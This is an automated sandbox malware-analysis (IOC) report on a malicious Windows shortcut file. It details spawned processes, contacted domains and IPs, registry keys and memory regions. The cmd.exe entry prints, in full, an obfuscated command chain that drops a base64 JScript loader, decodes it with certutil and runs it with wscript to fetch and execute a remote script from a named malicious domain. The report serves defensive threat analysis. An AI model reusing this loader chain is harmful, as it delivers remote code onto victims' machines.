Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Windows\System32\cmd.exe

C:\Windows\system32\cmd.exe /V/D/c md C:\QxdHVBD\>nul 2>&1 &&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw==>!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY!

Details

Is windows:	true
Is dropped:	false
PID:	6120
Target ID:	1
Parent PID:	6096
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	C:\Windows\system32\cmd.exe /V/D/c md C:\QxdHVBD\>nul 2>&1 &&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw==>!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY!
Size:	273920
MD5:	4E2ACF4F8A396486AB4268C94A6A245F
Time:	07:46:02
Date:	01/02/2023
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff707bb0000
Modulesize:	405504
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Windows shortcut file (LNK) starts blacklisted processes	Persistence and Installation Behavior	Process Discovery
Obfuscated command line found	Data Obfuscation	Command and Scripting Interpreter Deobfuscate/Decode Files or Information
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection

C:\Windows\System32\wscript.exe

"C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS"

Details

Is windows:	true
Is dropped:	false
PID:	5220
Target ID:	3
Parent PID:	6120
Name:	wscript.exe
Class:	wscript
Path:	C:\Windows\System32\wscript.exe
Commandline:	"C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS"
Size:	163840
MD5:	9A68ADD12EB50DDE7586782C3EB9FF9C
Time:	07:46:03
Date:	01/02/2023
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff73faf0000
Modulesize:	180224
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection

C:\Windows\System32\certutil.exe

cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jS

Details

Is windows:	true
Is dropped:	false
PID:	1648
Target ID:	2
Parent PID:	6120
Name:	certutil.exe
Class:	system-tools
Path:	C:\Windows\System32\certutil.exe
Commandline:	cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jS
Size:	1557504
MD5:	EB199893441CED4BBBCB547FE411CF2D
Time:	07:46:02
Date:	01/02/2023
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff72d670000
Modulesize:	1589248
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://gwae8.industryinfluence.shop/?3/

172.67.221.22

http://gwae8.industryinfluence.shop/b

unknown

hTtP://gwae8.industryinfluence.shop/?3/

unknown

https://www.cloudflare.com/cdn-cgi/errorZ

unknown

https://www.cloudflare.com/

unknown

https://www.cloudflare.com/cdn-cgi/error

104.16.124.96

http://gwae8.industryinfluence.shop/

unknown

https://www.cloudflare.com/cdn-cgi/error(

unknown

https://www.cloudflare.com/cdn-cgi/errorZ.4

unknown

https://www.cloudflare.com/cdn-cgi/error&

unknown

https://www.cloudflare.com/cdn-cgi/error2.L

unknown

https://www.cloudflare.com/~

unknown

There are 2 hidden URLs, click here to show them.

Domains

Name

Malicious

gwae8.industryinfluence.shop

172.67.221.22

Details

Name:	gwae8.industryinfluence.shop
IP:	172.67.221.22
TargetID:	3
Current Path:	C:\Windows\System32\wscript.exe
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Snort IDS alert for network traffic	Networking
System process connects to network (likely due to code injection or exploit)	Networking, HIPS / PFW / Operating System Protection Evasion	Process Injection
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

www.cloudflare.com

104.16.124.96

Details

Name:	www.cloudflare.com
IP:	104.16.124.96
TargetID:	3
Current Path:	C:\Windows\System32\wscript.exe
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
System process connects to network (likely due to code injection or exploit)	Networking, HIPS / PFW / Operating System Protection Evasion	Process Injection
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

IPs

Domain

Country

Malicious

172.67.221.22

gwae8.industryinfluence.shop

United States

Details

IP:	172.67.221.22
TargetID:	3
Current Path:	C:\Windows\System32\wscript.exe
Country:	United States
Countrycode:	USA
ASN number:	13335
ASN name:	CLOUDFLARENETUS
Private:	false
Domain:	gwae8.industryinfluence.shop

Signature Hits	Behavior Group	Mitre Attack
Snort IDS alert for network traffic	Networking
System process connects to network (likely due to code injection or exploit)	Networking, HIPS / PFW / Operating System Protection Evasion	Process Injection

104.16.124.96

www.cloudflare.com

United States

Details

IP:	104.16.124.96
TargetID:	3
Current Path:	C:\Windows\System32\wscript.exe
Country:	United States
Countrycode:	USA
ASN number:	13335
ASN name:	CLOUDFLARENETUS
Private:	false
Domain:	www.cloudflare.com

Signature Hits	Behavior Group	Mitre Attack
System process connects to network (likely due to code injection or exploit)	Networking, HIPS / PFW / Operating System Protection Evasion	Process Injection
Uses secure TLS version for HTTPS connections	Compliance, Networking

Registry

Path

Value

Malicious

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

LangID

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

C:\Windows\System32\WScript.exe.FriendlyAppName

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

C:\Windows\System32\WScript.exe.ApplicationCompany

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7

Name

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7

Name

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7

Name

Memdumps

Base Address

Regiontype

Protect

Malicious

29B8EFB7000

heap

page read and write

29B8EFC5000

heap

page read and write

29B8EFC4000

heap

page read and write

29B8EFBE000

heap

page read and write

29B90E13000

heap

page read and write

29B927B0000

heap

page read and write

130114A0000

heap

page read and write

29B8F0D0000

heap

page read and write

2DC8DDE000

stack

page read and write

130114F0000

heap

page read and write

29B8EFDE000

heap

page read and write

29B8EF3C000

heap

page read and write

CA225FF000

stack

page read and write

29B8EF38000

heap

page read and write

29B8EFB7000

heap

page read and write

29B8EF4D000

heap

page read and write

29B8EFE2000

heap

page read and write

CA223F9000

stack

page read and write

2DC8CDC000

stack

page read and write

29B8F0D5000

heap

page read and write

29B90DF0000

remote allocation

page read and write

13011248000

heap

page read and write

29B8EFC2000

heap

page read and write

29B8EFC4000

heap

page read and write

29B8EFE8000

heap

page read and write

29B8EF8D000

heap

page read and write

29B92920000

trusted library allocation

page read and write

29B8EFC8000

heap

page read and write

29B90C90000

heap

page read and write

29B8EFDB000

heap

page read and write

29B8EF18000

heap

page read and write

CA220FF000

stack

page read and write

130130D0000

heap

page read and write

29B8EF80000

heap

page read and write

29B8EFE8000

heap

page read and write

29B8EFC5000

heap

page read and write

29B8EFDF000

heap

page read and write

13011400000

heap

page read and write

29B90C95000

heap

page read and write

29B8EFDB000

heap

page read and write

29B8EF44000

heap

page read and write

2DC8D5E000

stack

page read and write

1301124C000

heap

page read and write

CA21EFE000

stack

page read and write

29B8EF8D000

heap

page read and write

13011210000

heap

page read and write

29B8EF4B000

heap

page read and write

29B8EDB0000

heap

page read and write

2DC907E000

stack

page read and write

29B8EFB7000

heap

page read and write

29B8EFE8000

heap

page read and write

29B8EF80000

heap

page read and write

29B90DF0000

heap

page read and write

29B8EF37000

heap

page read and write

29B8EF8D000

heap

page read and write

29B8EFD0000

heap

page read and write

29B8F0DE000

heap

page read and write

CA21DFE000

stack

page read and write

130114F5000

heap

page read and write

29B8F0A4000

heap

page read and write

29B8EFBE000

heap

page read and write

29B8EFD0000

heap

page read and write

CA224FF000

stack

page read and write

29B8EF10000

heap

page read and write

29B8EFB7000

heap

page read and write

130111A0000

heap

page read and write

29B8EFBE000

heap

page read and write

29B8EFBE000

heap

page read and write

29B90DF5000

heap

page read and write

29B8EFE8000

heap

page read and write

29B8EF68000

heap

page read and write

29B8EFD0000

heap

page read and write

29B8EF44000

heap

page read and write

29B8EF9D000

heap

page read and write

CA21916000

stack

page read and write

CA21CFE000

stack

page read and write

29B90DF0000

remote allocation

page read and write

29B8EF3C000

heap

page read and write

29B8EFD0000

heap

page read and write

29B8EF69000

heap

page read and write

29B90E19000

heap

page read and write

CA226FD000

stack

page read and write

29B8EF44000

heap

page read and write

29B8F010000

heap

page read and write

29B8EEF0000

heap

page read and write

29B8EFC5000

heap

page read and write

13011238000

heap

page read and write

29B8EFE2000

heap

page read and write

29B8EF80000

heap

page read and write

29B8EF8D000

heap

page read and write

CA222FE000

stack

page read and write

29B8EFE2000

heap

page read and write

29B8EFC8000

heap

page read and write

29B8EFE8000

heap

page read and write

29B90DF0000

remote allocation

page read and write

29B8EFBE000

heap

page read and write

29B8EFC2000

heap

page read and write

29B8EF80000

heap

page read and write

29B8EFC8000

heap

page read and write

29B8EFE8000

heap

page read and write

29B8EFC2000

heap

page read and write

29B90E19000

heap

page read and write

29B8EFB7000

heap

page read and write

29B8F0A0000

heap

page read and write

CA221FF000

stack

page read and write

29B8EF96000

heap

page read and write

13011230000

heap

page read and write

29B8EFD0000

heap

page read and write

29B8EF66000

heap

page read and write

There are 99 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
uk231b27we.lnk

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportuk231b27we.lnk

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
uk231b27we.lnk